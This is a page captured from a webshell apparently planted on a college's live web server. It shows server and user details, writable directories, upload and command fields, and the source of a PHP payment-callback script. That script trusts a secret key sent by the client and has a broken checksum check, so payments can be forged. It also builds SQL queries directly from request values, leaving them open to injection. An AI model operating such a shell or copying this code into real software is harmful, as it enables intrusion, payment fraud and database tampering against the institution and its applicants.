403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.69.58.211
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/eace_entranceForm/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/eace_entranceForm/responseBankIT.php
<?php
session_start();
if(session_id() == '') {
    session_start();
}
//echo $ptype=$_SESSION['ptype'];
//echo $dept=$_SESSION['dept'];
$matNo=$_SESSION['transID'];
//success+trans_amount + merchant_no + merchant_trans_id + response_url + secret_key

$success = $_POST['SUCCESS'];
$etztransid = $_POST['TRANSACTION_REF'];//TRANSACTION_ID
$transid = $_POST['TRANSACTION_ID'];
//echo $transCode;
$terminal_id = $_POST['TERMINAL_ID'];
$final_checksum = $_POST['FINAL_CHECKSUM'];
$response_url = $_POST['RESPONSE_URL'];
$new_checksum = $_POST['CHECKSUM'];
$trans_num = $_POST['TRANS_NUM'];
$reference = $_POST['DESCRIPTION'];
$secret_key = $_POST['SECRET_KEY'];
//$secret_key = "DEMO_KEY";
$amount = $_POST['AMOUNT'];
$response_code = $_POST['SUCCESS'];
$ptype=$_SESSION['ptype2'];
$dept=$_SESSION['dept'];
$formNo=$_SESSION['transID'];

//echo '<br>'.$successs = $_GET['SUCCESS'];
//echo '<br>'. $etztransids = $_GET['TRANSACTION_REF'];//TRANSACTION_ID
//echo '<br>'.	$transids = $_GET['TRANSACTION_ID'];
//echo '<br>'.	$terminal_ids = $_GET['TERMINAL_ID'];
//		$response_urls = $_GET['RESPONSE_URL'];
//        $final_checksums = $_GET['FINAL_CHECKSUM'];
//        $new_checksums = $_GET['CHECKSUM'];
//        $trans_nums = $_GET['TRANS_NUM'];
//        $references = $_GET['DESCRIPTION'];
//		$secret_keys = $_GET['SECRET_KEY'];
//        $amounts = $_GET['AMOUNT'];
//        $response_codes = $_GET['SUCCESS'];

//        $msg = $_POST['msg'];
$msg = "";
$status_desc = "";
//$matNo=$_SESSION['matNo'];
$transDate=time();
$finalcheck=hash("sha256" ,$success.$amount.$terminal_id.$transid.$secret_key);
if(isset($_POST['FINAL_CHECKSUM']) == $finalcheck){

}
else {
    echo '<p class="error">Wrong FinalCheckSum.</p>';
    echo '<p class="error">$finalcheck</p>';
    echo '<p class="error">$final_checksum</p>';

}
$transApproved="False";
switch ($response_code) {
    case "0":
//                $status_desc = "Transaction successful. Payment accepted";
        $status_desc = "Approved";
        $transApproved="True";
        break;
    case "-1":
        $status_desc = "Transaction timeout or invalid parameters or unsuccessful transaction in the case of Query History";
        break;
    case "1":
        $status_desc = "Destination Card Not Found";
        break;
    case "2":
        $status_desc = "Card Number Not Found";
        break;
    case "3":
        $status_desc = "Invalid Card PIN";
        break;
    case "4":
        $status_desc = "Card Expiration Incorrect";
        break;
    case "5":
        $status_desc = "Insufficient balance";
        break;
    case "6":
        $status_desc = "Spending Limit Exceeded";
        break;
    case "7":
        $status_desc = "Internal System Error Occurred, please contact the service provider";
        break;
    case "8":
        $status_desc = "Financial Institution cannot authorize transaction, Please try later";
        break;
    case "9":
        $status_desc = "PIN tries Exceeded";
        break;
    case "10":
        $status_desc = "Card has been locked";
        break;
    case "11":
        $status_desc = "Invalid Terminal Id";
        break;
    case "12":
        $status_desc = "Payment Timeout";
        break;
    case "13":
        $status_desc = "Destination card has been locked";
        break;
    case "14":
        $status_desc = "Card has expired";
        break;
    case "15":
        $status_desc = "PIN change required";
        break;
    case "16":
        $status_desc = "Invalid Amount";
        break;
    case "17":
        $status_desc = "Card has been disabled";
        break;
    case "18":
        $status_desc = "Unable to credit this account immediately, credit will be done later";
        break;
    case "19":
        $status_desc = "Transaction not permitted on terminal";
        break;
    case "20":
        $status_desc = "Exceeds withdrawal frequency";
        break;
    case "21":
        $status_desc = "Destination Card has expired";
        break;
    case "22":
        $status_desc = "Destination Card Disabled";
        break;
    case "23":
        $status_desc = "Source Card Disabled";
        break;
    case "24":
        $status_desc = "Invalid Bank Account";
        break;
    case "25":
        $status_desc = "Insufficient Balance";
        break;
    case "26":
        $status_desc = "CHECKSUM/FINAL_CHECKSUM error";
        break;
    default:
        $status_desc = "Your Transaction was not Successful. No amount was debited from your account.";
        break;
}
if ($msg == "") {
    $msg = $status_desc;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
    <title></title>
</head>
<body>
<table width="50%" align="center" cellpadding="3" cellspacing="5">
    <tr>
        <td align="center"><img src="../images/eace_siwesHead.png" width="731" height="95"></td>
    </tr>
    <tr>
        <td><fieldset><legend>Payment Detail</legend>
                <div style="text-align: center;">    <form id="form1">
                        <div>
                            <table class="table">
                                <tr class="active">
                                    <td align="left">
                                        <b>Transaction ID:</b></td>
                                    <td><?php echo $transid;?></td>
                                </tr>
                                <!--						                        <tr class="active">-->
                                <!--                            <td >-->
                                <!--                               GET  Transaction ID:</td>-->
                                <!--                            <td>--><?php //echo $transids;?><!--</td>-->
                                <!--                        </tr>-->
                                <tr class="info">
                                    <td align="left">
                                        <b>Transaction Status:</b></td>
                                    <td><?php echo $status_desc; ?></td>
                                </tr>
                                <!--						 <tr class="info">-->
                                <!--                            <td >-->
                                <!--                                GET Transaction Status:</td>-->
                                <!--                            <td>--><?php //echo $status_descs; ?><!--</td>-->
                                <!--                        </tr>-->
                                <tr class="active">
                                    <td align="left">
                                        <b>Payment Description:</b></td>
                                    <td><?php echo $reference; ?></td>
                                </tr>
                                <!--						                       <tr class="active">-->
                                <!--                            <td >-->
                                <!--                                GET Payment Description:</td>-->
                                <!--                            <td>--><?php //echo $references; ?><!--</td>-->
                                <!--                        </tr>-->
                                <tr class="info">
                                    <td align="left">
                                        <b> Amount:</b></td>
                                    <td><?php echo $amount;    ?></td>
                                </tr>
                                <!--						 <tr class="info">-->
                                <!--                            <td >-->
                                <!--                                GET Amount:</td>-->
                                <!--                            <td>--><?php //echo $amount; ?><!--</td>-->
                                <!--                        </tr>-->
                            </table>

                            <?php
                            require_once('../connect.php');
                            $db=db_connect();

                            require('../filetoU/logFile.php');
                            $orderID=$transid;
                            $logD='Payment. OrderID: '.$orderID.' PaymentType: '.$reference;
                            logDetail($matNo,$logD);
                            $ade="UPDATE `fedpoly`.`eace_remitaorderform` SET `remitaRRR` = '$trans_num',`transDate` = CURRENT_TIMESTAMP,`transStatus` = '$response_code',`transDetail` = '$msg',`transApproved` ='$transApproved' WHERE `orderID` ='$orderID'";
                            $db->query($ade);


                            //=====================Application Form ======================================
                            //        echo $reference;
                            //        if (($reference == '01BNKITApplication Form Fee') and ($response_code == 0)) {
                            if (($reference == 'Application Form Fee') and ($response_code == 0)) {
                                $matSQLK = "select * from eace_entrancetable where transID='$formNo'";
                                $mat=$db->query("$matSQLK");
                                if ($mat->rowCount()>0){
                                    $r_fetch=$mat->fetch(PDO::FETCH_BOTH);
                                    $ptype=$r_fetch['formType'];
                                    $dept=$r_fetch['dept'];
                                }

                                echo '<a href="formPaymentReciept.php" target="_blank">Click Here to Print Application Receipt</a><hr>';


                                if ($dept < 10) {
                                    $deptCode = '0' . $dept;
                                } else {
                                    $deptCode = $dept;
                                }
//    die($deptCode);

//end formType code generation
//echo $ptype;

                                if ($ptype == 'aceForm') {
                                    $formCode = '8';
                                } else {
                                    $formCode = '0';
                                }
//echo $formCode;
//End of Form type Code

//generate serial Number

                                $matSQL = "select * from eace_entrancetable where formNo<>''";
                                $matResult = $db->query($matSQL);
                                $matNum = $matResult->rowCount();
                                if ($matNum >= 0) {
                                    $realNo = $matNum + 1;
                                    if ($realNo < 10) {
                                        $serialNo = '0000' . $realNo;
                                    } elseif ($realNo < 100) {
                                        $serialNo = '000' . $realNo;
                                    } elseif ($realNo < 1000) {
                                        $serialNo = '00' . $realNo;
                                    } elseif ($realNo < 10000) {
                                        $serialNo = '0' . $realNo;
                                    } else {
                                        $serialNo = $realNo;
                                    }

                                    $entranceUpdate = $db->query("select * from eace_remitaorderform where orderID='$orderID'");
                                    $entranceUpdate_fetch = $entranceUpdate->fetch(PDO::FETCH_BOTH);
                                    $transCode = $entranceUpdate_fetch['regNo'];
                                    $matNo . 'matNo';
                                    $transCode . 'transCode';
                                    if ($transCode == $matNo) {
                                        $newMatNo = '19' . $formCode . $deptCode . $serialNo;
//            die($formCode);
                                        //mysql_query("UPDATE `fedpoly`.`realdataform` SET `matNo` = '$newMatNo',`usernamea` = '$newMatNo',`passworda` = '$newMatNo',`fresher` = '10' WHERE `realdataform`.`formNo` ='$matNo'");
                                        $db->query("UPDATE `fedpoly`.`eace_remitaorderform` SET `regNo` = '$newMatNo' WHERE `eace_remitaorderform`.`orderID` ='$orderID'");
                                        $db->query("UPDATE `fedpoly`.`eace_entrancetable` SET `formNo` = '$newMatNo' WHERE `eace_entrancetable`.`transID` ='$transCode'");
                                        $db->query("UPDATE `fedpoly`.`eace_admitted` SET `formNo` = '$newMatNo',formStatus=0 WHERE `eace_admitted`.`jambNo` ='$formNo' or jambNo like '$formNo%'");
                                        echo $formNo;
                                        $_SESSION['matNo'] = $newMatNo;
//            die($paymentType);
//
                                        echo '<font color="#FF0000"><h2><br> Note: Your form Number is ' . $newMatNo . '</h2></font>';
//            echo 'Here';
                                    } else {
                                        $matSQLa = "select * from eace_entrancetable where transID='$matNo'";
                                        $matResulta = $db->query($matSQLa);
                                        $matResulta_fetch = $matResulta->fetch(PDO::FETCH_BOTH);
                                        $_SESSION['matNo'] = $newMatNo = $transCode;
                                        echo '<font color="#FF0000"><h2><br> Note: Your form Number is ' . $matResulta_fetch['formNo'] . '</h2></font>';
                                    }
                                }
                                //End of generation
                                echo"<div style=color: #ae2b2b>Kindly Write Down Your Details Before Proceed</div><br><a href=apply.php?user=".$matNo ."&formNo=".$newMatNo."><p>Click Here to Proceed</a>";
                            }

                            ?>
                        </div>
                    </form>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit